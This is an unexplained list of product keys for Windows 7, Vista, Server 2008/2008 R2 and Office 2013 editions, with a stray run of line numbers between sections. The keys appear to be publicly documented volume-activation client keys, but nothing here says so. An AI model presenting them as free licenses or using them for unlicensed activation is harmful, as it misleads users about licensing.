#############################  Windows  7 2008R2  ####################################
Windows 7 Professional                                FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4
Windows 7 Professional N                            MRPKT-YTG23-K7D7T-X2JMM-QY7MG
Windows 7 Professional E                            W82YF-2Q76Y-63HXB-FGJG9-GF7QX
Windows 7 Enterprise                                33PXH-7Y6KF-2VJC9-XBBR8-HVTHH
Windows 7 Enterprise N                                YDRBP-3D83W-TY26F-D46B2-XCKRJ
Windows 7 Enterprise E                                C29WB-22CC8-VJ326-GHFJW-H9DH4
Windows Server 2008 R2 Web                            6TPJF-RBVHG-WBW2R-86QPH-6RTM4
Windows Server 2008 R2 HPC edition                    TT8MH-CG224-D3D7Q-498W2-9QCTX
Windows Server 2008 R2 Standard                        YC6KT-GKW9T-YTKYR-T4X34-R7VHC
Windows Server 2008 R2 Enterprise                    489J6-VHDMP-X63PK-3K798-CPX3Y
Windows Server 2008 R2 Datacenter                    74YFP-3QFB3-KQT8W-PMXWJ-7M648
Windows Server 2008 R2 for Itanium-based Systems    GT63C-RJFQ3-4GMB6-BRFB9-CB83V
#############################  Windows  Vista 2008 ####################################
Windows Vista Business                                YFKBB-PQJJV-G996G-VWGXY-2V3X8
Windows Vista Business N                            HMBQG-8H2RH-C77VX-27R82-VMQBT
Windows Vista Enterprise                            VKK3X-68KWM-X2YGT-QR4M6-4BWMV
Windows Vista Enterprise N                            VTC42-BM838-43QHV-84HX6-XJXKV
Windows Web Server 2008                                WYR28-R7TFJ-3X2YQ-YCY4H-M249D
Windows Server 2008 Standard                        TM24T-X9RMF-VWXK6-X8JC9-BFGM2
Windows Server 2008 Standard without Hyper-V        W7VD6-7JFBR-RX26B-YKQ3Y-6FFFJ
Windows Server 2008 Enterprise                        YQGMW-MPWTJ-34KDK-48M3W-X4Q6V
Windows Server 2008 Enterprise without Hyper-V        39BXF-X8Q23-P2WWT-38T2F-G3FPG
Windows Server 2008 HPC                                RCTX3-KWVHP-BR6TB-RB6DM-6X7HP
Windows Server 2008 Datacenter                        7M67G-PC374-GR742-YH8V4-TCBY3
Windows Server 2008 Datacenter without Hyper-V        22XQ2-VRXRG-P8D42-K34TD-G3QQC
Windows Server 2008 for Itanium-Based Systems        4DWFP-JF3DJ-B7DTH-78FJB-PDRHK
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
Office 2013 Professional Plus            YC7DK-G2NP3-2QQC3-J6H88-GVGXT
Office 2013 Standard                    KBKQT-2NMXY-JJWGP-M62JB-92CD4
Project 2013 Professional                FN8TT-7WMH6-2D4X9-M337T-2342K
Project 2013 Standard                    6NTH3-CW976-3G3Y2-JK3TX-8QHTT
Visio 2013 Professional                    C2FG9-N6J68-H8BTJ-BW3QX-RM3B3
Visio 2013 Standard                        J484Y-4NKBF-W2HMG-DBMJC-PGWR7
Access 2013                                NG2JY-H4JBT-HQXYP-78QH9-4JM2D
Excel 2013                                VGPNG-Y7HQW-9RHP7-TKPV3-BG7GB
InfoPath 2013                            DKT8B-N7VXH-D963P-Q4PHY-F8894
Lync 2013                                2MG3G-3BNTT-3MFW9-KDQW3-TCK7R
OneNote 2013                            TGN6P-8MMBC-37P2F-XHXXK-P34VW
Outlook 2013                            QPN8Q-BJBTJ-334K3-93TGY-2PMBT
PowerPoint 2013                            4NT99-8RJFH-Q2VDH-KYG2C-4RD4F
Publisher 2013                            PN2WF-29XG2-T9HJ7-JQPJR-FCXK4
Word 2013                                6Q7VD-NX8JD-WJ2VH-88V73-4GBJ7